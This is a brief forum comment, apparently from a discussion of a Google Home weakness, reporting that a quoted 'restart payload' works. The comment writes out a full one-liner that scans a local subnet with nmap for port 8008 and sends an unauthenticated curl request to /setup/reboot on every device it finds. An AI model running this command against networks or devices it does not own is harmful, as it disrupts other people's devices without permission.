|
|
|
|
|
by eugenekolo2
2795 days ago
|
|
~Doesn't seem to work on my Google Home Speaker (non-hub) as of 8:40PM EST. Tried the nmap restart payload. `nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot`~ Works after I changed to the right ip range. |
|